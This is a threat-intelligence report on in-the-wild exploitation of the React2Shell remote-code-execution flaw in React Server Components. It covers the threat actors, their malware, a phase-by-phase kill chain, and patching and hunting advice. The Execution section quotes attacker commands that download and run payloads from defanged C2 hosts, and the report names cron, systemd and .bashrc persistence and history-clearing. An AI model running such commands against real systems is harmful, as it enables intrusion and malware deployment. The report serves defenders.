【CyCraft Monthly Intelligence】React2Shell Exploitation: Global Impact Analysis of Coordinated Attacks by Chinese Threat Actors

‍

Threat and Impact

React2Shell (CVE-2025-55182) is a Remote Code Execution (RCE) vulnerability found in React Server Components (RSC). The critical threat of this vulnerability lies in its pre-authentication nature. Attackers only need to send a single HTTP request to execute arbitrary code under the identity of the web server user. Because popular frameworks like Next.js embed these packages, the impact is widespread and the barrier to exploitation is extremely low. In many deployment environments, if the vulnerable system package exists, the system is vulnerable enough to be compromised.

‍

Analyst Perspective

React2Shell has enabled multiple threat groups to rapidly exploit the vulnerability on a global scale, targeting a vast number of React/Next.js workloads. The impact ranges from establishing stealthy persistence to causing substantial operational and financial consequences, particularly within cloud and VPS hosting environments.

‍

Incident Description

Following the disclosure of the React2Shell vulnerability on December 3, 2025, widespread exploitation occurred within days. Google Threat Intelligence observed coordinated actions by multiple China-related threat actors, alongside attacks from financially motivated attackers and Iran-linked groups. The most active groups deployed a mix of tunnelers, backdoors, and miners:

• UNC6600: Utilize the MINOCAT tunneler (with embedded FRP) to establish covert access channels and maintain long-term stealth.
• UNC6586: Deploy the SNOWLIGHT downloader (a VSHELL component) to download additional malicious payloads from external C2 servers.
• UNC6588: Use the COMPOOD backdoor, disguising it as a benign binary file.
• UNC6603: Utilize an updated version of the HISONIC backdoor, concealing configuration traffic within legitimate cloud services and primarily targeting AWS and Alibaba Cloud workloads in the APAC region.
• UNC6595: Utilize ANGRYREBEL.LINUX, masquerading as sshd and employing anti-forensic techniques on VPS infrastructure.

Reports also indicate that Earth Lamia (UNC5454) and Jackpot Panda have exploited this vulnerability, while other cybercrime syndicates have deployed XMRig miners on a massive scale.

Key Impacts:

• Internet-facing React and Next.js applications are at risk, even if the vulnerable package exists only as transitive dependencies.
• The effectiveness of Edge/WAF protections at load balancers and entry points is tested.
• Attackers frequently tamper with host persistence mechanisms (e.g., systemd services, cron jobs) and user shell initialization files (e.g., .bashrc) to maintain long-term access.
• Once exploited, systems immediately initiate connections to retrieve malicious payloads and establish C2 channels; therefore, monitoring for anomalous outbound connections is critical.

‍

Technical Details

Root cause

• Vulnerability Type: Unauthenticated RCE in React Server Components (RSC).
• Affected Packages/Versions: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0, 19.1.0, 19.1.1, and 19.2.0.
• Exploitation Features: A single HTTP request can trigger arbitrary code execution within the context of the web server process. Attackers can exploit this even if the vulnerable package exists only as transitive dependencies. Attackers employ various payload encoding methods, including in-memory Next.js Web Shells.

Reconnaissance

• Conduct overall Internet scanning to identify applications containing vulnerable RSC packages and exploitable Next.js endpoints.
• Rapidly fingerprint the system from the initial foothold to identify the operating system, services, and permissions.
• Perform basic reconnaissance to verify actual privilege levels, enumerate network interfaces, DNS settings, and potential sensitive credential stores.

Resource Development

• Establish and reuse C2 infrastructure:
  
  • Use reactcdn.windowserrorapis[.]com to host SNOWLIGHT/VSHELL via HTTPS.
  • Host directly on 45.76.155[.]14 for COMPOOD (path /vim).
• Abuse legitimate platforms for obfuscation:
  
  • HISONIC utilizes Cloudflare Pages and GitLab to host encrypted configuration files.
• Packaging Attack Capability:
  
  • MINOCAT integrates a customized NSS wrapper and embeds an FRP (Fast Reverse Proxy) client.
• Tool Exchange:
  
  • Share scanner/PoC code on underground forums.
  • Use GitHub to distribute miners and partial exploit code, mixed with fake or invalid repositories and samples targeting security researchers.

Initial Access

• Vector: Send a single unauthenticated HTTP request to public-facing React/Next.js applications, exploiting CVE-2025-55182.
• Outcome: Achieve code execution with the same privileges as the web server process, enabling the immediate execution of subsequent commands.

Execution

Common execution path: The web server process invokes curl or wget to retrieve bash scripts and ELF binaries, subsequently executing them.

• Observed representative kill chains and commands:
  
  • MINOCAT (UNC6600): Bash installer creates $HOME/.systemd-utils, terminates the ntpclient process, downloads the MINOCAT ELF file, and executes it.
  • SNOWLIGHT/VSHELL (UNC6586): curl/wget retrieves a script that downloads and executes SNOWLIGHT. SNOWLIGHT then sends an HTTPS GET request to fetch staged payloads: curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>
  • COMPOOD (UNC6588): wget http://45.76.155[.]14/vim -O /tmp/vim. Masquerad as Vim during the execution: /tmp/vim"/usr/lib/polkit-1/polkitd --no-debug"
  • HISONIC (UNC6603): Deploy a Go-based backdoor, retrieving encrypted configurations from legitimate services.
  • ANGRYREBEL.LINUX (UNC6595): : Installed via b.sh, masquerading as sshd and executing in a non-standard /etc location.
  • XMRig (financially-motivated): sex.sh pulls and launches the miner from GitHub, adding a systemd unit to maintain operation.

Persistence

• Cron: Add scheduled tasks to automatically launch payloads (e.g., MINOCAT).
• systemd: Create service units for automatic startup and service resilience (e.g., MINOCAT service, "system-update-service" used by XMRig).
• Shell RC injection: Insert malicious command blocks into user shell configuration files (e.g., ~/.bashrc) to restart payloads upon new sessions.

Privilege Escalation

Service/Daemon abuse and masquerading:

• Execute malware as system services (systemd) or similar methods to inherit elevated privileges in misconfigured environments.
• COMPOOD executes with parameters resembling polkitd; ANGRYREBEL.LINUX masquerades as sshd under /etc to blend in with privileged Daemons.

Defense Evasion

• File and process masquerading:
  
  • MINOCAT creates hidden directories (e.g., $HOME/.systemd-utils)
  • COMPOOD is named and placed to resemble Vim; ANGRYREBEL.LINUX appears as sshd in non-standard paths.
• Anti-forensics:
  
  • Timestomp (tampering with file timestamps) and clear shell history (history -c).
  • Terminate ntpclient to cover tracks or disrupt monitoring.
• Traffic and configuration obfuscation:
  
  • HISONIC retrieves XOR-encoded configurations hosted on Cloudflare Pages/GitLab, segregated by specific markers (e.g., 115e1fc47977812...).
  • SNOWLIGHT retrieves staged payloads via HTTPS and masquerades as legitimate files.
• Benign-appearing persistence mechanisms:
  
  • Use deceptive service names (e.g., "system-update-service" for cryptocurrency mining).

Lateral Movement

• Reverse channels:
  
  • MINOCAT embeds an FRP client to establish a reverse tunnel back to attacker infrastructure, facilitating pivoting and access to internal assets.
• Deploy backdoor for cross-host access:
  
  • SNOWLIGHT/VSHELL, COMPOOD, and HISONIC provide remote tasking and C2 callbacks.
  • ANGRYREBEL.LINUX masquerades as sshd, supporting stealthy cross-host SSH compromise.

Commandand Control

• HTTP(S)-based C2:
  • SNOWLIGHT/VSHELL sends GET requests with specific parameters to reactcdn.windowserrorapis[.]com:443 (e.g., t=tcp, a=l64, stage=true) to pull staged payloads.
• Blend into cloud services:
  
  • HISONIC retrieves encrypted configurations from Cloudflare Pages and GitLab, making traffic appear benign.
• Other backdoors:
  
  • COMPOOD possesses C2 capabilities (interactive shell, PTY, HTTP/TCP, SOCKS proxy), though subsequent C2 activities observed in some cases were limited.

Malware traits andnotable indicators

Impact

• Resource hijacking: Deployment of XMRig via sex.sh for illicit cryptocurrency mining, maintained by a counterfeit systemd unit named system-update-service.
• Service manipulation: Termination of the ntpclient process during the installation of MINOCAT.
• Managerial impacts:
  
  • Widespread targeting and rapid weaponization: Exploitation began almost immediately following the vulnerability disclosure, involving both espionage and profit-driven motives. While some public PoCs contained fake or trapped repositories, they accelerated the proliferation of exploitation, posing further challenges for researchers.
  • Concentrated risks in cloud and Internet-facing environments: We observed that Internet-facing React/Next.js applications are under the highest pressure, particularly cloud-hosted workloads (AWS, Alibaba Cloud) and international VPS environments. Containerized and self-hosted deployments containing vulnerable RSC packages are equally exposed.
• Consequences:
  
  • Attackers gain stealthy access and C2 capabilities via tunnelers or backdoors (MINOCAT, HISONIC, COMPOOD, SNOWLIGHT), maintaining persistence through cron/systemd and hijacking shell initialization programs, while masquerading as system executables.
  • Service degradation caused by the miner (XMRig), potentially impacting performance and causing spikes in cloud costs.
  • Anti-forensics techniques such as clearing history and timestomping increase operational risk, making incident response and scoping significantly more difficult.
  • While widespread evidence of data exfiltration is not yet confirmed in current reports, the persistence of backdoor access marks the potential for data theft and intrusions remain significant.
• Industry impact: Victims span across multiple sectors. Current telemetry and public reports indicate that finance, retail, logistics, IT/tech, education, and government sectors have all been affected. The attacks clearly focus on cloud-hosted web infrastructure rather than any specific vertical industry.
• Victim footprint: The impact is universal but concentrated in APAC cloud environments. Historical tracking of certain payloads (e.g., COMPOOD) indicates footprints across Taiwan, Vietnam and China.
• Strategic implications:
  
  • High severity and low barrier path: With a CVSS score of 10.0 (v3.x), attackers only need to send a single HTTP request to compromise a system. React2Shell has become a preferred initial access vector for both state-level actors and cybercriminals.
  • Expanded attack surfaces: Following CVE‑2025‑55182, React disclosed additional issues (CVE‑2025‑55183 Information Disclosure, CVE‑2025‑55184, and CVE‑2025‑67779 Denial of Service). This indicates a period of heightened scrutiny, and attackers will continue to pay close attention.
  • Supply chain and dependency blind spots: Many organizations discover vulnerable RSC packages exist as transitive dependencies. This places monorepos, containers, and CI/CD artifacts at extreme risk without notice.

Conclusion

The disclosure of React2Shell has triggered subsequent vulnerability enumeration, signaling a high-risk period for this technology. Even though two of the subsequent vulnerabilities are DoS/Info disclosure—affecting only availability or confidentiality—their presence necessitates an elevation of scrutiny. Enterprises must adopt rapid iterative patching to defend against escalating operational risks.

‍‍

Mitigation

Patch as the primarycontrol

• Immediately upgrade vulnerable RSC packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0, 19.1.0, 19.1.1, or 19.2.0.
• Minimum fix for RCE: Versions 19.0.1, 19.1.2, or 19.2.1. (Versions 19.2.2 and 19.2.3 are relatively safe).
• Subsequent patching:
  
  • CVE-2025-55183 (Info Disclosure): Version 19.2.2
  • CVE-2025-55184 & CVE-2025-67779 (DoS): Version 19.2.3 (DoS protection in 19.2.2 is incomplete).
• Recommendation: Treat version 19.2.3 as the primary target for environment-wide deployment to resolve RCE and subsequent issues.
• Scope and inventory: Even if the specific feature is not enabled, the mere presence of the affected RSC package constitutes risks of exploitation. Comprehensive auditing of React/Next.js and any application bundling these packages is required. The audit scope should cover source code repositories, containers, and existing running images.

Temporary virtualpatching at the edge

• Deploy WAF rules immediately to block React2Shell attack attempts. Enable these rules on Internet-facing load balancers while patching and verifying all instances.
• Treat WAF as a temporary measure, not a substitute for patching, due to the diversity of payload formats and the rapid evolution of attack techniques.

Targeted detection, hunting, and containment

Given the prevalence of exploitation and the fact that post-compromise activities often begin within minutes, assume unpatched systems are compromised and hunt for the following:

• Process and network indicators:
  
  • Web server processes spawning curl or wget to retrieve and execute payloads.
  • Outbound connections to observed C2/staging sites:
    
    • reactcdn.windowserrorapis[.]com with query patterns like &t=tcp&a=…&stage=true (SNOWLIGHT/VSHELL).。
    • 45.76.155[.]14/vim (COMPOOD)。
  • Signs of FRP-like tunneling behavior (MINOCAT) or implants pulling configurations (HISONIC) from Cloudflare Pages or GitLab.
• Persistence and host changes
  
  • Creation of hidden directories: $HOME/.systemd-utils。
  • New or modified persistence mechanisms: Utilize Cron, masquerade systemd services (e.g., "system-update-service" for XMRig, MINOCAT services), and command injection in shell initialization files ($HOME/.bashrc and other rc files).
  • Anomalous process activity: Termination of ntpclient.
  • Masquerading or anti-forensics: Binaries in atypical paths (e.g., COMPOOD in /tmp/vim, fake sshd under /etc), timestomping, and clearing shell history (history -c).
• Specific malware hunting
  
  • Scan disk and memory for MINOCAT, COMPOOD and SNOWLIGHT using provided YARA rules/IOCs.
  • Search for HISONIC configuration markers: 115e1fc47977812 … 725166234cf88gxx.
• Containment and eradication upon detection
  
  • Isolate the host, terminate malicious processes, remove malicious Cron entries and systemd units, restore shell initialization files, delete staged binaries and hidden directories, block observed C2 at the egress, rebuild systems from known good images, and rotate credentials on the host or used by the application.

Strengthen exposureand blast‑radius controls

• Minimize outbound connections from application servers to prevent single HTTP attack from freely retrieving payloads or connecting to C2.
• Enforce least-privilege outbound rules and Proxy white lists.
• Run web services with non-privileged accounts, restrict write permissions to system directories and shell initialization files, and monitor execution from temporary or non-standard paths (e.g., anomalous binaries under /tmp or /etc).
• Ensure logs for web access, process execution and outbound connections are retained and searchable to support rapid scoping.

Immediate action checklist

• Immediately activate managed WAF rules.
• Inventory and patch all affected applications to fixed versions; we recommend prioritizing an environment-wide upgrade to version 19.2.3.
• Hunt for signs of compromise based on the indicators above; contain and eradicate if found.
• Strengthen outbound and host hardening controls; ensure logging and alerting cover the described behaviors.

‍Reference

• Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
• China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
• Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
• CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation
• Detecting React2Shell: The maximum-severity RCE vulnerability affecting React Server Components and Next.js

‍

IoCs (Indicator of Compromise)

IP/Domain

Files